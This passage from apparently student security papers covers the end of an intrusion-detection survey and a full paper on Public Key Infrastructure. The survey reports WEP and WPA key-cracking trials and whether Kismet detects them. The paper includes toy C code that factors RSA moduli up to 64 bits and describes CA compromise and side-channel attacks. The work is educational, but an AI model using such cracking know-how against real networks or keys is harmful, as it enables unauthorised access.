first attempt, it requires only about 10 min and 5000 packets to crack a 5
char key. All the subsequent attempts on 5 char and 13 char key requires
much more packets and the run time could take up hours. However, the IDS
(Kismet) could not detect any problem, because no suspicious traffic is
generated, and it could not raise any alert.
 Active attack. The time required to crack the WEP key is reduced to about
10-15 minutes on average, because a large amount of traffic could be
generated. However, kismet raises several alerts, including the alerts on:
increase in duplicate IVS, large amount of duplicate frames received and
short de-authentication flood.
279
 For WPA key: It only requires to capture a few frames during the connection
establishment between the AP and the client. Therefore, only passive attack type is
needed. After the frames needed are captured, a dictionary based attack is carried
out. The results are actually mixed. When the keys used are common words, the
attack succeeded within a few minutes. However, when the keys used are complex
mixed words, the attacks failed. Besides, since there are no packet generated by the
attacker, and the number of frames required to start the attack is very small (the
bulk of the work is the brute force offline attack), Kismet cannot detect this threat.
However, if a strong key is used, it could take a very long time for the attacker to
be able to crack the key, and therefore the WPA encryption scheme is still
relatively secured if handled correctly.
7
Conclusion
From our survey and analysis on these types of IDPS, we can see that each type of
IDPS provides different detection and prevention capabilities, they operate on
different parts of an organization's network system, and they has different strengths
and weaknesses on detecting different types of threat. Network-based IDPS is the type
that can monitor and analyze the widest range of the network system. It can response
to the most types of events, and it is often the general back bone of the system.
However, for many specific types of threat, using other types of IDPS is much more
effective and efficient, and sometime, inevitable: Wireless IDPS is much more
suitable for securing the wireless network of the organization, Network Behavior
Analysis can react better against attacks that generate an unusual amount of traffic on
the network (such as under a DoS attack, where the Network-based IDPS, due to
overwhelmed by number of packets to examine, could perform much worse), and
Host-based IDPS is better at analyzing activity that is transferred through and end-toend communication channel (containing encrypted packet that Network-based IDPS
cannot examine), and therefore Host-based IDPS will be much more suitable for
protecting important hosts of the network. Therefore, in many systems, especially the
big organization, in order to achieve a robust IDPS solution, it is needed to
incorporate a combination, or even all of these different IDPS types. Sometimes, even
different products of the same IDPS could be used, because each vendor might use
different technologies in their development, which could make their product more
effective against some particular types of threat in compared to others.
If the organization really needs to make use of different IDPS system, they also
need to consider how to integrate them in some way to achieve higher efficiency; for
example: a network -based IDPS could provide data for a network-based analysis
system to analyze. In addition, the organization should also include other types of
technologies, besides IDPS, to achieve comprehensive security, such as firewall,
routers, and even physical border or guards. On the other hand, the cost of each of
these IDPS solution is quite high, especially for small to medium businesses.
Therefore, implementing redundant and extra protection beyond an organization's
needs could also bring many troubles.
280
There's no fast and hard rule, but each organization should carefully balance
between their needs and their budget, so that they could achieve the required security
level at an affordable cost.
8
Bibliography
Charles P. Pfleeger, Shari Lawrence Pfleeger. Security in Computing, Fourth Edition,.
Deckerd, G. (2006, November 23). Wireless Attacks from an Intrusion Detection.
Hutchison, K. (2004, October 18). Wireless Intrusion Detection Systems. London.
Karen Scarfone, Peter Mell. (2007, February). Guide to Intrusion Detection and
Prevention Systems (IDPS). Gaithersburg, MD, United States of America: U.S.
Department of Commerce.
281
282
Public Key Infrastructure:
An exploration into what Public Key
Infrastructure is, how it’s implemented, and how
the greatest vulnerability of the Public Key
Infrastructure has nothing to do with their keys.
Laurence Putra Franslay
National University of Singapore, School of Computing
Singapore
[email protected]
http://www.geeksphere.net
Abstract. This paper aims to introduce the reader to the concept of
Public Key Infrastructure. It will explore the various types of Public Key
Infrastructures currently in place, as well as how they work. The paper
will then move on to specific infrastructures, and discuss the possible
threats and vulnerabilities to these Infrastructures. The paper will also
explore threats and vulnerabilities that have occurred in the past.
1
Introduction
The concept of the Public Key Infrastructure is effectively an arrangement consisting of software, hardware, people and policies that certifies a public key to
be representative of an identity, most of the time, would be either a person of a
company. [1]
This whole arrangement then gives an identity to the person who is issuing
the public key, certifying that he is who he says he is.
2
2.1
Background Knowledge
What exactly is it?
This entire concept of a Public Key Infrastructure is not new. Prior to computers,
we had these things called Passports, which in a sense was the public keys of
those of us going abroad. Locally, we had identification cards. And these Public
Keys(passports and identification cards) were issued by the embassy, or the
government, which acted as what we call the Certificate Authorities these days.
Hence, as we can see, the entire notion of a Public Key infrastructure is not
new, and has existed within society even before computers, and that to fully
understand Public Key Infrastructure, and the security behind it, we have to
283
understand the reasons why it has been around, and how it affects our lives, as
well the existing vulnerabilities found in existing Public Key Infrastructures that
are not related to computing. After all, these infrastructures have been around
way longer than computers have been, and hence would have experienced more
attempts to circumvent them.
2.2
How does the Public Key Infrastructure work?
For this section onwards, most of the terms used will be describing that of within
the sphere of Computer Science, while at the same time occasionally drawing on
real world examples.
At the center of every Public Key Infrastructure is a Certificate Authority,
which will issue and verify digital certificates. How these certificates are generated is very simple and straightforward. First, the owner/server will generate
his own set of public key/private key, for uses such as encrypting traffic on the
Secure Sockets Layer, as well as identifying the server as the valid server.[2]
After generating this public key/private key pair, the Certificate Authority
will then take the public key belonging to the owner/server, and sign it. How
this signing process takes place is quite straightforward as well. The Certificate
Authority will take the Public Key of the owner/server, store it in a file alongside
other information identifying the owner, including but not limited to the contact
information, and encrypt it using their own private key. The certificate, which
can then be decrypted using the Certificate Authority’s public key will show
that this certificate was indeed signed by the Certificate Authority, and that the
connection between the server and end user is somewhat secure.
Figure 1 below is a rough representation on how the Public Key Infrastructure
works.
Fig. 1. The role a Certificate Authority plays in the trust chain.[3]
284
3
Research
In this paper, the main research done was to measure the rate of cracking RSA
keypairs, and what it means for the future of RSA encryption, especially in
light of the fact that clusters can be activated at a moment’s notice, and that
distributed computing is now starting to gain popularity once again.
One approach I will be using on this would be to estimate how much it would
take in order to fully crack a 1024 bit RSA key, both in terms of money, as well
as time and compute power.
In addition to that, I will also be looking at other possible attack vectors on
Public Key Infrastructure, on how it’s reliability can be undermined, and how
someone can successfully spoof the identity of another.
3.1
RSA and Public Key Infrastructure
What is RSA? RSA stands for Rivset, Shamir, and Adleman, which in essence
is an algorithm described by the 3 of them for use in Public Key Cryptography.
It was the first algorithm that was suitable for both signing and encrypting of
data, and was undoubtedly one of the greatest leap forward in terms of Public
Key Cryptography.[4] RSA for now is believed to be secure enough, given that
there is sufficiently long keys in the range of 1024bits to 2048bits, and it’s said
that it is unlikely that people will be able to crack it in the near future.
How RSA works? In RSA, both the public key and private key are generated
from the algorithm. The Public Key is often used to encrypt the data sent over
to the server, in this case, data such as the session id of the logged in user, as well
as other information such as the password that the user sends over for logging
in. The server will then use it’s private key to decrypt the data.
The keys are generated as such. First, 2 large and distinct primes p and q
are chosen at random, and are of similar bit length(i.e. same number of bits to
represent both numbers). So for example, a 1024 bit modulus would require 2
512bit prime numbers.
The modulus will then be represented by n, where n = pq, where p and q are
the two prime numbers selected at random earlier. φ(n) will then be calculated,
where φ(n) = (p − 1)(q − 1). Afterwards, a integer e will be selected, such that
it fulfills both conditions 1 < e < φ(n) and gcd(e, φ(n)) = 1. e in this case will
have a short bit length for more efficient encryption, but not so short such that
it becomes insecure. This e will then be the public key exponent. d, the private
key exponent would then be calculated such that d = e−1 modφ(n), which is
most of the time calculated using the extended Euclidean algorithm.
How does RSA relate to Public Key Infrastructure In most modern
Public Key Infrastructures, RSA is used to generate the keys for the encryption/decryption process. For example, when one access a website through HTTPS,
most of the time the response that the users return to the server are encrypted
285
using the public key. In addition, the certificate signed by the Certificate Authority on the certificates that servers use to prove their identity are more often
that not signed using RSA as well. Lastly, when we SSH over to servers, their
public key generated using RSA is used to identify the server, as well as encrypt
the traffic between the server and the client.
3.2
Cracking RSA
Methodology As described above, the RSA key pair is generated by using 2
large prime numbers, p and q, and in order to exploit it, one would have to first
find these 2 numbers, p and q. The only way to find these 2 numbers would
be to factorise n, and find p and q. However, due to the limitations of the C
language( no 128/256/512 bit integers), and no straightforward solution to do
parallel programming in python, I cracked 8bit, 16bit, 32bit, 48bit, 52bit, 56bit,
60bit and 64bit keys, took the readings, and extrapolated from there.
The experiment was done on a 12- core server with 2.5 Ghz per core.
Code to generate prime numbers p and q
#include <stdio.h>
#include <time.h>
#include <math.h>
unsigned long long generate(int nbits);
int isPrime(unsigned long long num);
unsigned long long randBits(int nbits);
int main(){
/*
due to lack of int128 support in c, and the inherent need for
parallel computing and that python support for parallel programming
is not really there, we have to resort to factorising a maximum of
64 bits.
*/
int nbits;
unsigned long long num1, num2;
printf("Please enter the number of bits for the final number: ");
scanf("%d", &nbits);
num1 = generate(nbits/2);
num2 = generate(nbits/2);
printf("Factors: %llu, %llu\n", num1, num2);
printf("Value: %llu\n", num1 * num2);
return 0;
}
unsigned long long generate(int nbits){
unsigned long long num = 4;
286
srand(time(NULL));
while(isPrime(num) == 0){
num = randBits(nbits);
srand(rand());
}
return num;
}
int isPrime(unsigned long long num){
int prime = 1;
unsigned long long root = sqrt(num);
long long i = 2;
#pragma omp parallel shared(prime) private(i)
{
#pragma omp for schedule(dynamic, 1)
for(i = 2; i <= root; i++){
if(num % i == 0){
prime = 0;
}
}
}
return prime;
}
unsigned long long randBits(int nbits){
unsigned long long min = pow(2, nbits - 1);
unsigned long long max = pow(2, nbits);
return rand() % (max - min) + min;
}
287
Code to crack modulus n
#include <stdio.h>
#include <math.h>
unsigned long long findFactor(unsigned long long num);
int main(){
/*
due to lack of int128 support in c, and the inherent need for
parallel computing and that python support for parallel programming
is not really there, we have to resort to factorising a maximum of
64 bits.
*/
unsigned long long num1, num2, value;
printf("Please enter the value to crack: ");
scanf("%llu", &value);
num1 = findFactor(value);
num2 = value/num1;
printf("Factors: %llu, %llu\n", num1, num2);
printf("Value: %llu\n", value);
return 0;
}
unsigned long long findFactor(unsigned long long num){
unsigned long long root = sqrt(num), factor = 0;
long long i = 2;
#pragma omp parallel private(i)
{
#pragma omp for schedule(dynamic, 1)
for(i = 2; i <= root; i++){
if(num % i == 0){
factor = i;
}
}
}
return factor;
}
288
Results The figures below shows the results of the experiment.
Fig. 2. Time taken to crack the various sized keys
289
Fig. 3. Average time taken to crack the various sized keys
Fig. 4. Time taken to crack the various sized keys
These results show a exponential growth in the time taken to crack the key
as the number of bits grow larger. For example, as the number of bits increase by
4 from 52bit to 56bit, there was roughly a 4 times increment in the time taken
to crack it. The pattern continued from 56bit to 60bit and 60bit to 64bit.
The readings for 32 bit and below are ignored as they are largely similar, and
the possible cause of that is due to the overhead required in doing multithreaded
programming, and hence ignored.
290
Deductions From the experiment, we can see that there is an average growth
of 4 times in the time take to crack the key every time there is an increment
of the key by 4 bits. Taking the data collected, we are able to see that there is
a y = 1.128 ∗ 10−6 ∗ 1.3956x relation between the number of bits and the time
taken to crack it, where x is the number of bits, and y is the time required in
seconds.
Also, from the data obtained, the time taken for it to run sequentially is approximately 12 times of the time take to run in parallel. Hence, we can deduce
that the load is roughly distributed equally between all 12 cores in the experiment. We can therefore assume that if we scale it up to more cores, the time
taken to crack the key will divide equally between the cores.
Conclusion for experiment Having received these results, and the deductions,
we will then calculate the time required to crack a 1024bit using the elastic
compute clusters offered by Amazon Web Services.
For a 1024bit key, using the equation from above, it would require 1.2482 ∗
10142 seconds for it to finish cracking a 1024bit key. This works out to 1.4447 ∗
10137 days on a single 2.5 Ghz core.
Assuming that a hacker is willing to spend approximately USD$7000 a month
to hack the key, he will be able to afford 40 Extra Large High CPU Compute Instance[6]. With 8 2.5 Ghz virtual cores per compute instance, this would give the
hacker 320 cores to use to crack the key. Even with this impressive infrastructure
behind him, it will still take 1.2369 ∗ 10132 years to crack it.
Hence, as can be seen from the above results, it is highly unlikely that the
key can be cracked using brute force[5], something which has been agreed upon
by Bruce Schneier, one of the legends on Computer Security. From his blog, and
I quote
”We’ve never factored a 1024-bit number – at least, not outside any secret government agency – and it’s likely to require a lot more than 15 million computer
years of work. The current factoring record is a 1023-bit number, but it was a
special number that’s easier to factor than a product-of-two-primes number used
in RSA. Breaking that Gpcode key will take a lot more mathematical prowess
than you can reasonably expect to find by asking nicely on the Internet. You’ve
got to understand the current best mathematical and computational optimizations of the Number Field Sieve, and cleverly distribute the parts that can be
distributed. You can’t just post the products and hope for the best.”[5]
3.3
Other Attack Vectors
However, despite the results above, that’s not to say that 1024bit RSA keys cannot be cracked. In March 2010, a group of researchers managed to hack 1024bit
RSA encryption by meddling with the voltage passing through the CPU.[7] By
exploiting a trait in the CPU, the researchers were able to slowly piece together
the bits in the key to form the private key.
291
Hence, even if RSA is secure, by compromising other parts of the system,
we can easily remove the security provided by RSA, and the whole Public Key
Infrastructure.
Another instance of such an attack that undermined the security of the Public Key Infrastructure was the recent Comodo Hack in March this year. The
hacker did not attack the key. Instead, what the hacker did was to go after
the equipment belonging to the Certificate Authority. By exploiting a variety
of loopholes, from 0-day vulnerabilities, to penetrating vulnerabilities in firewalls, the hacker was able to gain access to the information required to spoof
the Certificate Authorities. [8]
From these instances, we can see that to exploit the whole Public Key Infrastructure, one does not need to try to hack the keys. One can instead go after
vulnerabilities in other parts of the system, in order to gain access to the keys,
and then spoof the Certificate Authorities or commit other acts.
4
Conclusion
From this paper, we can hence see that the Public Key Infrastructures utilizing
RSA is still very strong and the keys are not very prone to being attacked, due to
the large amounts of resources required. However, at the same time, we also can
see there are many parts in the mechanism behind the Public Key Infrastructure,
not just the encryption/decryption keys.
And in light of the fact that there are so many different parts supporting the
entire Public Key Infrastructure, every aspect of this Infrastructure has to be
sturdy in order for it to be fully secure. Hence, in light of recent attacks on the
other parts of this infrastructure, more attention needs to be placed on these
aspects as well, rather than just the Public and Private Key.
292
References
1. Jim Brayton, Andrea Finneman, Nathan Turajski, and Scott Wiltsey: SearchSecurity.com PKI(public key infrastructure) October 2006
http://searchsecurity.techtarget.com/definition/PKI
2. Song Y. Yan: Cryptanalytic attacks on RSA
3. isode.com
A
Short
Tutorial
on
Distributed
PKI
http://www.isode.com/whitepapers/dist-pki-tutorial.html
4. Rivest, R.; A. Shamir; L. Adleman: A Method for Obtaining Digital Signatures
and Public-Key Cryptosystems(1978) Communications of the ACM 21 (2) 120-126
http://theory.lcs.mit.edu/ rivest/rsapaper.pdf
5. Bruce Schneier Kaspersky Labs Trying to Crack 1024-bit RSA(June 2008)
http://www.schneier.com/blog/archives/2008/06/kaspersky labs.html
6. Amazon Web Services Amazon Elastic Compute Cloud(Amazon EC2)
https://aws.amazon.com/ec2/#pricing
7. Sean Hollister Engadget 1024-bit RSA encryption cracked by carefully starving
CPU of electricity (March 2010) http://www.engadget.com/2010/03/09/1024-bitrsa-encryption-cracked-by-carefully-starving-cpu-of-ele/
8. Peter Bright ars technica Comodo hacker: I hacked DigiNotar too; other
CAs breached (Oct 2011) http://arstechnica.com/security/news/2011/09/comodohacker-i-hacked-diginotar-too-other-cas-breached.ars
293